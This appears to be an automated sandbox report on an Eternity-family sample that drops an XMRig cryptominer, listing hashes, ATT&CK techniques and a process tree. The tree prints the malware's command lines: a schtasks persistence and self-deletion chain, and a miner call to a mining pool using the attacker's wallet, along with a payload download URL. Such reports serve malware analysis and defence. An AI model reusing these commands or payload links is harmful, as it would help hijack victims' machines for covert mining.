eternity | a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b

General

Target

0x0003000000000737-1039.exe
Size

14KB
MD5

a922561dc3eb681a439a93b07257f606
SHA1

ed45d4bfcdcfcc226bd6e66ce772f3c20b7e8241
SHA256

a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b
SHA512

25d74be339bdd2fab4af1e52304a9c131271068baefde87a33d8a3df9160a0ea9f90358e4228faf79d8e97d2a7ffd9503122b18f238b3f470a956509608433d9
SSDEEP

384:frnPpyQr13n3KBIPVIJv9zo5+mbVjyN6Tw/j0asEkx:1qv9M/bM7Yaq

Score

10^/10

eternity xmrig miner

Malware Config

Extracted

Family

eternity

Wallets

47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q

Attributes

payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe

Signatures

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral2/files/0x000b000000022d37-18.dat	family_xmrig
behavioral2/files/0x000b000000022d37-18.dat	xmrig
behavioral2/files/0x000b000000022d37-23.dat	family_xmrig
behavioral2/files/0x000b000000022d37-23.dat	xmrig
behavioral2/files/0x000b000000022d37-24.dat	family_xmrig
behavioral2/files/0x000b000000022d37-24.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation	0x0003000000000737-1039.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation	0x0003000000000737-1039.exe

Executes dropped EXE 3 IoCs

pid	Process
4124	0x0003000000000737-1039.exe
2428	Admin_QOLMEYBB.exe
628	0x0003000000000737-1039.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2960	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2536	PING.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4124	0x0003000000000737-1039.exe
Token: SeLockMemoryPrivilege	2428	Admin_QOLMEYBB.exe
Token: SeLockMemoryPrivilege	2428	Admin_QOLMEYBB.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2428	Admin_QOLMEYBB.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 624 wrote to memory of 3468	624	0x0003000000000737-1039.exe	86
PID 624 wrote to memory of 3468	624	0x0003000000000737-1039.exe	86
PID 624 wrote to memory of 3468	624	0x0003000000000737-1039.exe	86
PID 3468 wrote to memory of 1288	3468	cmd.exe	88
PID 3468 wrote to memory of 1288	3468	cmd.exe	88
PID 3468 wrote to memory of 1288	3468	cmd.exe	88
PID 3468 wrote to memory of 2536	3468	cmd.exe	89
PID 3468 wrote to memory of 2536	3468	cmd.exe	89
PID 3468 wrote to memory of 2536	3468	cmd.exe	89
PID 3468 wrote to memory of 2960	3468	cmd.exe	94
PID 3468 wrote to memory of 2960	3468	cmd.exe	94
PID 3468 wrote to memory of 2960	3468	cmd.exe	94
PID 3468 wrote to memory of 4124	3468	cmd.exe	95
PID 3468 wrote to memory of 4124	3468	cmd.exe	95
PID 3468 wrote to memory of 4124	3468	cmd.exe	95
PID 4124 wrote to memory of 2428	4124	0x0003000000000737-1039.exe	97
PID 4124 wrote to memory of 2428	4124	0x0003000000000737-1039.exe	97

C:\Users\Admin\AppData\Local\Temp\0x0003000000000737-1039.exe
"C:\Users\Admin\AppData\Local\Temp\0x0003000000000737-1039.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "0x0003000000000737-1039" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\0x0003000000000737-1039.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3468
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2536
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn "0x0003000000000737-1039" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2960
- - C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe
    "C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4124
  - - C:\Users\Admin\AppData\Local\Temp\Admin_QOLMEYBB.exe
      "C:\Users\Admin\AppData\Local\Temp\Admin_QOLMEYBB.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q.Admin_QOLMEYBB -p x --max-cpu-usage=40 --donate-level=1
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2428

C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe
C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe
1⤵
- Executes dropped EXE
PID:628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0x0003000000000737-1039.exe.log

Filesize
321B

MD5
baf5d1398fdb79e947b60fe51e45397f

SHA1
49e7b8389f47b93509d621b8030b75e96bb577af

SHA256
10c8c7b5fa58f8c6b69f44e92a4e2af111b59fcf4f21a07e04b19e14876ccdf8

SHA512
b2c9ef5581d5eae7c17ae260fe9f52344ed737fa851cb44d1cea58a32359d0ac5d0ca3099c970209bd30a0d4af6e504101f21b7054cf5eca91c0831cf12fb413

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe

Filesize
14KB

MD5
a922561dc3eb681a439a93b07257f606

SHA1
ed45d4bfcdcfcc226bd6e66ce772f3c20b7e8241

SHA256
a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b

SHA512
25d74be339bdd2fab4af1e52304a9c131271068baefde87a33d8a3df9160a0ea9f90358e4228faf79d8e97d2a7ffd9503122b18f238b3f470a956509608433d9

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe

Filesize
14KB

MD5
a922561dc3eb681a439a93b07257f606

SHA1
ed45d4bfcdcfcc226bd6e66ce772f3c20b7e8241

SHA256
a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b

SHA512
25d74be339bdd2fab4af1e52304a9c131271068baefde87a33d8a3df9160a0ea9f90358e4228faf79d8e97d2a7ffd9503122b18f238b3f470a956509608433d9

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe

Filesize
14KB

MD5
a922561dc3eb681a439a93b07257f606

SHA1
ed45d4bfcdcfcc226bd6e66ce772f3c20b7e8241

SHA256
a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b

SHA512
25d74be339bdd2fab4af1e52304a9c131271068baefde87a33d8a3df9160a0ea9f90358e4228faf79d8e97d2a7ffd9503122b18f238b3f470a956509608433d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_QOLMEYBB.exe

Filesize
5.2MB

MD5
606ce310d75ee688cbffaeae33ab4fee

SHA1
b9aff434fd737d8009a8d92cd34b5e4c4c0117a8

SHA256
75f92b9a79c8f680cf1230653e3ae6c97d694afc0f7eec88f92cf6b6f3f38b50

SHA512
825e8b7d794fdfdb04b6f153eb220a45f12c4243d62d0d304744539d5f56cdfe660a78af150756d87ccfa0b0bbf73cdce5a35341120372012fdd9300ce2d5b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_QOLMEYBB.exe

Filesize
5.2MB

MD5
606ce310d75ee688cbffaeae33ab4fee

SHA1
b9aff434fd737d8009a8d92cd34b5e4c4c0117a8

SHA256
75f92b9a79c8f680cf1230653e3ae6c97d694afc0f7eec88f92cf6b6f3f38b50

SHA512
825e8b7d794fdfdb04b6f153eb220a45f12c4243d62d0d304744539d5f56cdfe660a78af150756d87ccfa0b0bbf73cdce5a35341120372012fdd9300ce2d5b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_QOLMEYBB.exe

Filesize
5.2MB

MD5
606ce310d75ee688cbffaeae33ab4fee

SHA1
b9aff434fd737d8009a8d92cd34b5e4c4c0117a8

SHA256
75f92b9a79c8f680cf1230653e3ae6c97d694afc0f7eec88f92cf6b6f3f38b50

SHA512
825e8b7d794fdfdb04b6f153eb220a45f12c4243d62d0d304744539d5f56cdfe660a78af150756d87ccfa0b0bbf73cdce5a35341120372012fdd9300ce2d5b63

Download Submit
memory/624-6-0x0000000075110000-0x00000000758C0000-memory.dmp

Filesize
7.7MB

Download
memory/624-2-0x0000000005A90000-0x0000000006034000-memory.dmp

Filesize
5.6MB

Download
memory/624-1-0x0000000000D60000-0x0000000000D6A000-memory.dmp

Filesize
40KB

Download
memory/624-0-0x0000000075110000-0x00000000758C0000-memory.dmp

Filesize
7.7MB

Download
memory/628-34-0x0000000075110000-0x00000000758C0000-memory.dmp

Filesize
7.7MB

Download
memory/628-33-0x00000000054E0000-0x00000000054F0000-memory.dmp

Filesize
64KB

Download
memory/628-31-0x0000000075110000-0x00000000758C0000-memory.dmp

Filesize
7.7MB

Download
memory/628-35-0x00000000054E0000-0x00000000054F0000-memory.dmp

Filesize
64KB

Download
memory/2428-29-0x000002DC01C40000-0x000002DC01C60000-memory.dmp

Filesize
128KB

Download
memory/2428-26-0x000002DC01C00000-0x000002DC01C40000-memory.dmp

Filesize
256KB

Download
memory/2428-25-0x000002DC01BB0000-0x000002DC01BD0000-memory.dmp

Filesize
128KB

Download
memory/2428-32-0x000002DC01C40000-0x000002DC01C60000-memory.dmp

Filesize
128KB

Download
memory/4124-28-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/4124-27-0x0000000075110000-0x00000000758C0000-memory.dmp

Filesize
7.7MB

Download
memory/4124-13-0x0000000004C60000-0x0000000004CC6000-memory.dmp

Filesize
408KB

Download
memory/4124-12-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/4124-11-0x0000000075110000-0x00000000758C0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads